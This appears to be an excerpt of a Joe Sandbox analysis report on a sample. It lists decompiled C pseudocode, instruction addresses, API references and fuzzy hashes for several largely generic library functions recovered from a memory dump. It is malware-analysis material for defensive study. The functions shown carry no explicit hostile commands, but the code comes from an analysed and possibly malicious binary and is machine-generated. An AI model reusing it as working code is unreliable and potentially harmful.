GetCurrentThreadId.KERNEL32 ref: 012F6ACA
std::_Throw_Cpp_error.LIBCPMT ref: 012F6BEF
std::_Throw_Cpp_error.LIBCPMT ref: 012F6C02
std::_Throw_Cpp_error.LIBCPMT ref: 012F6C09

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentStartupThreadgethostbynamegethostnameinet_ntoa
String ID:
API String ID: 4025713785-0
Opcode ID: 5196b45b117bdbab1c9599285848e37957ca95238ce871bb206dc1dde50b0c41
Instruction ID: f5adbe90bada48aa1a3c8f5e602158efdabf56ce404bf8fa67636e72ce1c4e2d
Opcode Fuzzy Hash: 5196b45b117bdbab1c9599285848e37957ca95238ce871bb206dc1dde50b0c41
Instruction Fuzzy Hash: A48169B1D1020A9FDB18DFA8C851BEEFBB4EF58314F14822DE615B7280D7756A44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01301940, Relevance: 6.2, APIs: 4, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E01301940(void* __ebx, intOrPtr __ecx, signed int _a4, signed int _a8) {
				intOrPtr _v8;
				signed short _v12;
				void* __esi;
				void* __ebp;
				signed short _t60;
				void* _t61;
				void* _t65;
				signed int _t67;
				signed short _t68;
				signed int _t72;
				signed int _t74;
				void* _t75;
				signed int _t77;
				signed int _t78;
				signed short _t81;
				intOrPtr _t86;
				void* _t88;
				signed int _t96;
				intOrPtr _t98;
				intOrPtr _t102;
				signed int _t103;
				signed char* _t106;
				signed int _t108;
				signed int _t110;
				unsigned int _t115;
				signed short _t117;
				void* _t123;

				_push(__ecx);
				_t102 = __ecx;
				_v8 = __ecx;
				if(( *(__ecx + 8) & 0x00000100) == 0) {
					_t115 = _a4 & 0x0000ffff;
					_t108 = _a8 & 0x0000ffff;
				} else {
					_t81 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)) + 4)))) + 0x20))();
					_t115 = _t81 & 0x0000ffff;
					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 4)))) + 0x20))(_a8, _a4);
					_t102 = _v8;
					_t108 = _t60 & 0x0000ffff;
				}
				_t86 =  *((intOrPtr*)(_t102 + 4));
				if(_t115 > _t108) {
					L25:
					return _t60;
				} else {
					while(1) {
						_t60 = E01302180(_t102);
						if(_t108 >= _t60) {
							break;
						}
						_t98 =  *((intOrPtr*)(_t86 + 0x18));
						_t127 = _t98;
						if(_t98 == 0) {
							_t78 = E0132EA8A(_t115, _t127, 0x20);
							asm("xorps xmm0, xmm0");
							_a4 = _t78;
							_t123 = _t123 + 4;
							_t98 = _t78;
							asm("movups [eax], xmm0");
							asm("movups [eax+0x10], xmm0");
							 *((intOrPtr*)(_t86 + 0x18)) = _t78;
						}
						_t77 = _t115 & 0x00000007;
						_t106 = (_t115 >> 3) + _t98;
						_t115 = _t115 + 1;
						asm("bts ecx, eax");
						 *_t106 =  *_t106 & 0x000000ff;
						_t102 = _v8;
						if(_t115 <= _t108) {
							continue;
						} else {
							return _t77;
						}
						goto L31;
					}
					__eflags = _t108 - _t115;
					if(_t108 < _t115) {
						goto L25;
					} else {
						_t61 = E01302190(_t102);
						__eflags = _t108 - _t115 - _t61;
						if(_t108 - _t115 >= _t61) {
							_t96 =  *(_t86 + 0x20);
							_a4 = _t96;
							__eflags = _t96;
							if(__eflags == 0) {
								_t74 = E0132EA8A(_t115, __eflags, 0xc);
								_a4 = _t74;
								_t123 = _t123 + 4;
								_t96 = _t74;
								_a4 = _t74;
								 *_t74 = 0;
								 *((intOrPtr*)(_t74 + 4)) = 0;
								 *((intOrPtr*)(_t74 + 8)) = 0;
								 *(_t86 + 0x20) = _t74;
							}
							_t103 =  *(_t96 + 4);
							__eflags =  *_t96 - _t103;
							if( *_t96 > _t103) {
								L20:
								 *( *(_t96 + 8) + _t103 * 2) = _t115;
								 *(_t96 + 4) =  *(_t96 + 4) + 1;
								_t115 =  *(_t86 + 0x20);
								_t96 =  *(_t115 + 4);
								__eflags =  *_t115 - _t96;
								if( *_t115 > _t96) {
									L24:
									_t60 =  *(_t115 + 8);
									 *(_t60 + _t96 * 2) = _t108;
									_t53 = _t115 + 4;
									 *_t53 =  *(_t115 + 4) + 1;
									__eflags =  *_t53;
									goto L25;
								} else {
									_t45 = _t96 + 0x10; // 0x10
									_t88 = _t45;
									__eflags = _t88 - 0x7fffffff;
									if(_t88 > 0x7fffffff) {
										goto L28;
									} else {
										_push(_t88 + _t88);
										_push( *(_t115 + 8));
										_t67 = E01349C40();
										_t123 = _t123 + 8;
										__eflags = _t67;
										if(__eflags == 0) {
											goto L29;
										} else {
											_t96 =  *(_t115 + 4);
											 *(_t115 + 8) = _t67;
											 *_t115 = _t88;
											goto L24;
										}
									}
								}
							} else {
								_t31 = _t103 + 0x10; // 0x17
								_t68 = _t31;
								_a8 = _t68;
								__eflags = _t68 - 0x7fffffff;
								if(_t68 > 0x7fffffff) {
									E012F4A60();
									goto L27;
								} else {
									_push(_t68 + _t68);
									_push( *(_t96 + 8));
									_t72 = E01349C40();
									_t123 = _t123 + 8;
									__eflags = _t72;
									if(__eflags == 0) {
										L27:
										E01316BCF(__eflags);
										L28:
										E012F4A60();
										L29:
										E01316BCF(__eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t115);
										_t117 = _v12;
										_push(_t108);
										_t110 =  *(_t96 + 4);
										_t65 = E013020E0(_t96, _t110, _t117, _v8);
										_t58 = _t110 + 0x24;
										 *_t58 =  *(_t110 + 0x24) | _t117;
										__eflags =  *_t58;
										return _t65;
									} else {
										_t96 = _a4;
										_t103 =  *(_t96 + 4);
										 *(_t96 + 8) = _t72;
										 *_t96 = _a8;
										goto L20;
									}
								}
							}
						} else {
							do {
								_push(_t115);
								_t75 = E01301C70(_t102);
								_t102 = _v8;
								_t115 = _t115 + 1;
								__eflags = _t115 - _t108;
							} while (_t115 <= _t108);
							return _t75;
						}
					}
				}
				L31:
			}

0x01301943
0x01301944
0x01301950
0x01301953
0x0130197f
0x01301983
0x01301955
0x01301960
0x01301966
0x01301974
0x01301977
0x0130197a
0x0130197a
0x01301987
0x0130198c
0x01301ac4
0x01301aca
0x01301992
0x01301992
0x01301994
0x0130199b
0x00000000
0x00000000
0x0130199d
0x013019a0
0x013019a2
0x013019a6
0x013019ab
0x013019ae
0x013019b1
0x013019b4
0x013019b6
0x013019b9
0x013019bd
0x013019bd
0x013019c7
0x013019ca
0x013019cc
0x013019d0
0x013019d3
0x013019d5
0x013019da
0x00000000
0x013019dc
0x013019e2
0x013019e2
0x00000000
0x013019da
0x013019e5
0x013019e7
0x00000000
0x013019ed
0x013019ef
0x013019f8
0x013019fa
0x01301a19
0x01301a1c
0x01301a1f
0x01301a21
0x01301a25
0x01301a2a
0x01301a2d
0x01301a30
0x01301a32
0x01301a35
0x01301a3b
0x01301a42
0x01301a49
0x01301a49
0x01301a4c
0x01301a4f
0x01301a51
0x01301a80
0x01301a83
0x01301a87
0x01301a8a
0x01301a8d
0x01301a90
0x01301a92
0x01301aba
0x01301aba
0x01301abd
0x01301ac1
0x01301ac1
0x01301ac1
0x00000000
0x01301a94
0x01301a94
0x01301a94
0x01301a97
0x01301a9d
0x00000000
0x01301a9f
0x01301aa2
0x01301aa3
0x01301aa6
0x01301aab
0x01301aae
0x01301ab0
0x00000000
0x01301ab2
0x01301ab2
0x01301ab5
0x01301ab8
0x00000000
0x01301ab8
0x01301ab0
0x01301a9d
0x01301a53
0x01301a53
0x01301a53
0x01301a56
0x01301a59
0x01301a5e
0x01301acd
0x00000000
0x01301a60
0x01301a62
0x01301a63
0x01301a66
0x01301a6b
0x01301a6e
0x01301a70
0x01301ad2
0x01301ad2
0x01301ad7
0x01301ad7
0x01301adc
0x01301adc
0x01301ae1
0x01301ae2
0x01301ae3
0x01301ae4
0x01301ae5
0x01301ae6
0x01301ae7
0x01301ae8
0x01301ae9
0x01301aea
0x01301aeb
0x01301aec
0x01301aed
0x01301aee
0x01301aef
0x01301af3
0x01301af4
0x01301af7
0x01301afb
0x01301b00
0x01301b05
0x01301b05
0x01301b05
0x01301b0c
0x01301a72
0x01301a72
0x01301a75
0x01301a78
0x01301a7e
0x00000000
0x01301a7e
0x01301a70
0x01301a5e
0x01301a00
0x01301a00
0x01301a00
0x01301a03
0x01301a08
0x01301a0b
0x01301a0c
0x01301a0c
0x01301a16
0x01301a16
0x013019fa
0x013019e7
0x00000000

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 01301ACD
Concurrency::cancel_current_task.LIBCPMT ref: 01301AD2
Concurrency::cancel_current_task.LIBCPMT ref: 01301AD7
Concurrency::cancel_current_task.LIBCPMT ref: 01301ADC

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 6e778cb3e9a1c11261b68d932cbbccff99f38248bb817bf5599412ab35713f22
Instruction ID: c46bd0941f3c7e1375d1de361095305dab7a13bebbd11741416f0a7b179bacf2
Opcode Fuzzy Hash: 6e778cb3e9a1c11261b68d932cbbccff99f38248bb817bf5599412ab35713f22
Instruction Fuzzy Hash: CA511471600205DFDB05DF68C4A0A6ABBE1FF98318B24C1ADEC4A8B391E731DD91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01347D6F, Relevance: 6.1, APIs: 4, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01347D6F(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed char _v5;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t63;
				intOrPtr _t64;
				signed int _t65;
				intOrPtr _t69;
				signed int _t73;
				signed char _t77;
				signed int _t82;
				signed int _t90;
				signed int _t93;
				signed int _t99;
				signed char _t103;
				signed char _t108;
				signed int _t110;
				intOrPtr _t113;
				intOrPtr* _t115;
				signed int _t116;

				_t93 = __ecx | 0xffffffff;
				_t63 =  *((intOrPtr*)(_a8 + 0x10));
				_t110 = 0;
				_v12 = 0;
				_t90 = 0;
				_v32 = 0;
				_v16 = 0;
				_t113 =  *((intOrPtr*)(_t63 + 0xc));
				_t64 =  *((intOrPtr*)(_t63 + 8));
				_v40 = _t113;
				_v36 = _t64;
				_v24 = 0;
				_v20 = _t93;
				_v5 = 1;
				_v28 = _t93;
				if(_t64 == 0) {
					L30:
					_t65 = 0;
				} else {
					do {
						_t115 =  *((intOrPtr*)(_t113 + _t90 * 4));
						if(_t90 - _t93 > _v24 && E01347EF6( *_t115, _a20) != 0) {
							if(( *(_t115 + 0x14) & 0x00000003) == 0) {
								_v32 = _t115;
							}
							_v16 = _t115;
							_v20 = _t90;
							_v24 =  *((intOrPtr*)(_t115 + 4));
						}
						if(E01347EF6( *_t115, _a12) == 0 || E01347ED2(_a4, _t115 + 8) != _a16) {
							L20:
							_t108 = _v5;
							goto L21;
						} else {
							_t108 = _v5;
							_t99 = _t90 - _v20;
							if(_t99 > _v24) {
								if(( *(_t115 + 0x14) & 0x00000005) != 0) {
									goto L21;
								} else {
									_t69 = _t115;
									_v12 = _t69;
									goto L22;
								}
								L32:
							} else {
								if(_t108 == 0) {
									L21:
									_t69 = _v12;
									goto L22;
								} else {
									_t73 = _v20;
									if(( *(_v16 + 0x14) & 0x00000040) != 0) {
										_t116 = _v16;
										_t77 =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x18)) + 0xc)) + _t99 * 4)) + 0x14);
										_t103 =  !(_t77 >> 2) & 0x00000001;
										asm("sbb al, al");
										_t108 = _t108 &  !( ~(_t77 & 0x00000001));
										_v5 = _t108;
									} else {
										if(_t73 == 0) {
											asm("sbb al, al");
											_t108 = _t108 &  !( ~( *(_t115 + 0x14) & 0x00000001));
											_v5 = _t108;
										}
										_t116 = _v16;
										_t103 = 1;
									}
									if(_t108 == 0 || _t103 == 0) {
										goto L21;
									} else {
										_t82 = E01347ED2(_a4, _t116 + 8);
										if(_t110 == 0 || _v28 == _t82) {
											_t110 = _t116;
											_v28 = _t82;
											goto L20;
										} else {
											goto L30;
										}
									}
								}
							}
						}
						goto L31;
						L22:
						_t93 = _v20;
						_t90 = _t90 + 1;
						_t113 = _v40;
					} while (_t90 < _v36);
					if(_t108 == 0 || _t110 == 0) {
						if(_t69 == 0) {
							goto L30;
						} else {
							_t65 = _v32;
							if(_t65 == 0) {
								goto L30;
							}
						}
					} else {
						_t65 = _t110;
					}
				}
				L31:
				return _t65;
				goto L32;
			}

0x01347d78
0x01347d7e
0x01347d81
0x01347d83
0x01347d86
0x01347d88
0x01347d8b
0x01347d8e
0x01347d91
0x01347d94
0x01347d97
0x01347d9a
0x01347d9d
0x01347da0
0x01347da4
0x01347da9
0x01347ecb
0x01347ecb
0x01347daf
0x01347daf
0x01347daf
0x01347db9
0x01347dcf
0x01347dd1
0x01347dd1
0x01347dd7
0x01347dda
0x01347ddd
0x01347ddd
0x01347dee
0x01347e91
0x01347e91
0x00000000
0x01347e0b
0x01347e0b
0x01347e10
0x01347e16
0x01347eb7
0x00000000
0x01347eb9
0x01347eb9
0x01347ebb
0x00000000
0x01347ebb
0x00000000
0x01347e1c
0x01347e1e
0x01347e94
0x01347e94
0x00000000
0x01347e20
0x01347e27
0x01347e2a
0x01347e47
0x01347e53
0x01347e5f
0x01347e64
0x01347e68
0x01347e6a
0x01347e2c
0x01347e2e
0x01347e37
0x01347e3b
0x01347e3d
0x01347e3d
0x01347e40
0x01347e43
0x01347e43
0x01347e6f
0x00000000
0x01347e75
0x01347e7c
0x01347e85
0x01347e8c
0x01347e8e
0x00000000
0x00000000
0x00000000
0x00000000
0x01347e85
0x01347e6f
0x01347e1e
0x01347e16
0x00000000
0x01347e97
0x01347e97
0x01347e9a
0x01347e9b
0x01347e9e
0x01347ea9
0x01347ec2
0x00000000
0x01347ec4
0x01347ec4
0x01347ec9
0x00000000
0x00000000
0x01347ec9
0x01347eaf
0x01347eaf
0x01347eaf
0x01347ea9
0x01347ecd
0x01347ed1
0x00000000

APIs

TypeidsEqual.LIBVCRUNTIME ref: 01347DC0
TypeidsEqual.LIBVCRUNTIME ref: 01347DE5
PMDtoOffset.LIBCMT ref: 01347DFB
PMDtoOffset.LIBCMT ref: 01347E7C

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction ID: 46f2248ccef7bda526ad9dd8ac0e025f39ddc8e7ae8fbea01847e96e8adb3b17
Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction Fuzzy Hash: A551AF3690420A9FDF21CF6CC4805EEBBF5EF05218F144A9AD995A7351D732BD89CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012F9580, Relevance: 6.1, APIs: 4, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E012F9580(signed int* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				intOrPtr* _v20;
				void* __esi;
				signed int _t14;
				intOrPtr* _t17;
				signed int _t18;
				signed int _t20;
				signed int _t21;
				signed int* _t25;
				intOrPtr* _t29;
				signed int* _t30;
				void* _t33;
				intOrPtr* _t34;
				signed int _t35;
				void* _t40;
				void* _t41;

				_t25 = __ecx;
				_push(0xffffffff);
				_push(0x13658e4);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(_t33);
				_t14 =  *0x13a4018; // 0x39cca9f6
				_push(_t14 ^ _t38);
				 *[fs:0x0] =  &_v16;
				_t29 = __ecx;
				_t17 = E0132EA8A(_t33, __eflags, 0xc);
				_t34 = _t17;
				_t41 = _t40 + 4;
				_v20 = _t34;
				_v8 = 0;
				if(_t34 == 0) {
					_t34 = 0;
					__eflags = 0;
					goto L5;
				} else {
					asm("xorps xmm0, xmm0");
					asm("movq [esi], xmm0");
					 *(_t34 + 8) = 0;
					 *(_t34 + 4) = 0;
					 *(_t34 + 8) = 1;
					__imp__#2(_a4);
					 *_t34 = _t17;
					if(_t17 != 0) {
						L5:
						_v8 = 0xffffffff;
						 *_t29 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							 *[fs:0x0] = _v16;
							return _t29;
						}
					} else {
						if(_a4 != _t17) {
							E0132FAD0(0x8007000e);
							L8:
							_t18 = E0132FAD0(0x8007000e);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t25);
							_push(_t34);
							_push(_t29);
							_t30 = _t25;
							_t35 =  *_t30;
							__eflags = _t35;
							if(_t35 != 0) {
								asm("lock xadd [esi+0x8], eax");
								_t18 = (_t18 | 0xffffffff) - 1;
								__eflags = _t18;
								if(_t18 == 0) {
									_t20 =  *_t35;
									__eflags = _t20;
									if(_t20 != 0) {
										__imp__#6(_t20);
										 *_t35 = 0;
									}
									_t21 =  *(_t35 + 4);
									__eflags = _t21;
									if(_t21 != 0) {
										L0132ECE6(_t21);
										_t41 = _t41 + 4;
										 *(_t35 + 4) = 0;
									}
									_push(0xc);
									_t18 = E0132EABA(_t35);
								}
								 *_t30 = 0;
							}
							return _t18;
						} else {
							goto L5;
						}
					}
				}
			}

0x012f9580
0x012f9583
0x012f9585
0x012f9590
0x012f9591
0x012f9592
0x012f9594
0x012f959b
0x012f959f
0x012f95a5
0x012f95a9
0x012f95ae
0x012f95b0
0x012f95b3
0x012f95b6
0x012f95bf
0x012f95f3
0x012f95f3
0x00000000
0x012f95c1
0x012f95c4
0x012f95c7
0x012f95cb
0x012f95d2
0x012f95d9
0x012f95e0
0x012f95e6
0x012f95ea
0x012f95f5
0x012f95f5
0x012f95fc
0x012f9600
0x00000000
0x012f9602
0x012f9607
0x012f9614
0x012f9614
0x012f95ec
0x012f95ef
0x012f961c
0x012f9621
0x012f9626
0x012f962b
0x012f962c
0x012f962d
0x012f962e
0x012f962f
0x012f9633
0x012f9634
0x012f9635
0x012f9636
0x012f9638
0x012f963a
0x012f963c
0x012f9641
0x012f9646
0x012f9646
0x012f9647
0x012f9649
0x012f964b
0x012f964d
0x012f9650
0x012f9656
0x012f9656
0x012f965c
0x012f965f
0x012f9661
0x012f9664
0x012f9669
0x012f966c
0x012f966c
0x012f9673
0x012f9676
0x012f967b
0x012f967e
0x012f967e
0x012f9689
0x012f95f1
0x00000000
0x012f95f1
0x012f95ef
0x012f95ea

APIs

SysAllocString.OLEAUT32 ref: 012F95E0
_com_issue_error.COMSUPP ref: 012F961C
_com_issue_error.COMSUPP ref: 012F9626
SysFreeString.OLEAUT32(-00000001), ref: 012F9650

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 587ea8e1544d08d3775d1a6eacbe35b22b8cb182abdb868c3240a4487af08298
Instruction ID: 9dc2211811c405a235ee29dff020b8332bf275f36f590a6e905bc24d95ba167f
Opcode Fuzzy Hash: 587ea8e1544d08d3775d1a6eacbe35b22b8cb182abdb868c3240a4487af08298
Instruction Fuzzy Hash: E031C5B19107169BEB309F5DD805B56FBE8EF40B28F10463EFA1997280E7B59580CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0134A20B, Relevance: 6.1, APIs: 4, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0134A20B(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E013577B7(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E013577B7(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E0134B429(GetLastError());
									_t17 =  *((intOrPtr*)(E0134B45F(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E0134A326(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E0134B429(GetLastError());
						_t17 =  *((intOrPtr*)(E0134B45F(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E0134A326(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E0134A3AB(_a8);
				return 0;
			}

0x0134a211
0x0134a216
0x0134a22a
0x0134a22d
0x0134a25f
0x0134a267
0x0134a269
0x0134a282
0x0134a285
0x0134a288
0x0134a296
0x0134a2a5
0x0134a2ad
0x0134a2af
0x0134a2c8
0x0134a2cb
0x0134a2cb
0x0134a2b1
0x0134a2b8
0x0134a2c3
0x0134a2c3
0x0134a2cd
0x0134a2ce
0x00000000
0x0134a2ce
0x0134a28d
0x0134a292
0x0134a294
0x00000000
0x00000000
0x00000000
0x0134a294
0x0134a272
0x0134a27d
0x00000000
0x0134a27d
0x0134a22f
0x0134a232
0x0134a235
0x0134a248
0x0134a24b
0x0134a24d
0x0134a24f
0x00000000
0x0134a24f
0x0134a23b
0x0134a240
0x0134a242
0x00000000
0x00000000
0x00000000
0x0134a242
0x0134a21b
0x00000000

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f601a7e55cebb34d0c8569129d1b40c597575f7d3cfeeefc22b4447487645fd
Instruction ID: dbfc3c8f20b1a4fa97fc1d2decbeb4e6f5febad4f8c8f2a91586c9f2540ac00a
Opcode Fuzzy Hash: 9f601a7e55cebb34d0c8569129d1b40c597575f7d3cfeeefc22b4447487645fd
Instruction Fuzzy Hash: EF21D87164462ABFDB21AF699C80C6BB7EDEF1026C7004624F92AD7140E733FC4097A0

Uniqueness

Uniqueness Score: -1.00%

Function 0130D9A0, Relevance: 6.1, APIs: 4, Instructions: 77
fileCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0130D9A0(void* __ebx, void* __edi, WCHAR* _a4) {
				signed int _v12;
				void* _v20;
				char _v24;
				void* _v28;
				void* _v32;
				void* __esi;
				signed int _t15;
				WCHAR* _t17;
				char* _t21;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				signed int _t54;

				_t15 =  *0x13a4018; // 0x39cca9f6
				_v12 = _t15 ^ _t54;
				_t17 = _a4;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x1c], xmm0");
				if(_t17[8] == 0) {
					L7:
					_pop(_t50);
					return E0132EA79(_v12 ^ _t54, _t50);
				} else {
					if(_t17[0xa] >= 8) {
						_t17 =  *_t17;
					}
					_t51 = CreateFileW(_t17, 0x80000000, 0, 0, 3, 0x80, 0);
					if(_t51 == 0xffffffff) {
						goto L7;
					} else {
						_t21 =  &_v24;
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x14], xmm0");
						__imp__GetFileSizeEx(_t51, _t21);
						if(_t21 == 0) {
							CloseHandle(_t51);
							_pop(_t52);
							return E0132EA79(_v12 ^ _t54, _t52);
						} else {
							CloseHandle(_t51);
							_pop(_t53);
							return E0132EA79(_v12 ^ _t54, _t53);
						}
					}
				}
			}

0x0130d9a6
0x0130d9ad
0x0130d9b0
0x0130d9b3
0x0130d9bd
0x0130d9c2
0x0130da4f
0x0130da5b
0x0130da65
0x0130d9c8
0x0130d9cc
0x0130d9ce
0x0130d9ce
0x0130d9e9
0x0130d9ee
0x00000000
0x0130d9f0
0x0130d9f0
0x0130d9f3
0x0130d9f8
0x0130d9fd
0x0130da05
0x0130da32
0x0130da3d
0x0130da4c
0x0130da07
0x0130da0e
0x0130da19
0x0130da28
0x0130da28
0x0130da05
0x0130d9ee

APIs

CreateFileW.KERNEL32(013836C0,80000000,00000000,00000000,00000003,00000080,00000000,?,4C4B4A49,?), ref: 0130D9E3
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,013836C0,00000000,?,?,?,?), ref: 0130D9FD
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,013836C0,00000000,?,?,?,?), ref: 0130DA0E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,013836C0,00000000,?,?,?,?), ref: 0130DA32

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
